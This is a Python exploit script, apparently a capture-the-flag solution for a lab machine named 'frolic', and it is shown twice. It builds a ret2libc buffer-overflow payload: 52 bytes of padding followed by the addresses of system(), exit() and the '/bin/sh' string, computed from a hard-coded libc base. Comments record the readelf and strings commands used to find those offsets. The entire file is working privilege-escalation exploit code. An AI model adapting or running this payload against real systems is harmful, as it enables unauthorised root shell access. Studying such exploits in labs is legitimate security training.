ibLeDy/privesc.py

## privesc.py
#!/usr/bin/python
from struct import pack

offset = 52
junk = "A" * offset

base_libc = 0xb7e19000

# www-data@frolic:/tmp$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -E "\ssystem|\sexit"
#    141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
#   1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0

system_addr_offset = 0x0003ada0
exit_addr_offset = 0x0002e9d0

# www-data@frolic:/tmp$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
# 15ba0b /bin/sh

bin_sh_addr_offset = 0x0015ba0b

system_addr = pack("<I", base_libc + system_addr_offset)
exit_addr = pack("<I", base_libc + exit_addr_offset)
bin_sh_addr = pack("<I", base_libc + bin_sh_addr_offset)

payload = junk.encode() + system_addr + exit_addr + bin_sh_addr

print(payload)
	#!/usr/bin/python
	from struct import pack

	offset = 52
	junk = "A" * offset

	base_libc = 0xb7e19000

	# www-data@frolic:/tmp$ readelf -s /lib/i386-linux-gnu/libc.so.6 \| grep -E "\ssystem\|\sexit"
	# 141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0
	# 1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0

	system_addr_offset = 0x0003ada0
	exit_addr_offset = 0x0002e9d0

	# www-data@frolic:/tmp$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 \| grep "/bin/sh"
	# 15ba0b /bin/sh

	bin_sh_addr_offset = 0x0015ba0b

	system_addr = pack("<I", base_libc + system_addr_offset)
	exit_addr = pack("<I", base_libc + exit_addr_offset)
	bin_sh_addr = pack("<I", base_libc + bin_sh_addr_offset)

	payload = junk.encode() + system_addr + exit_addr + bin_sh_addr

	print(payload)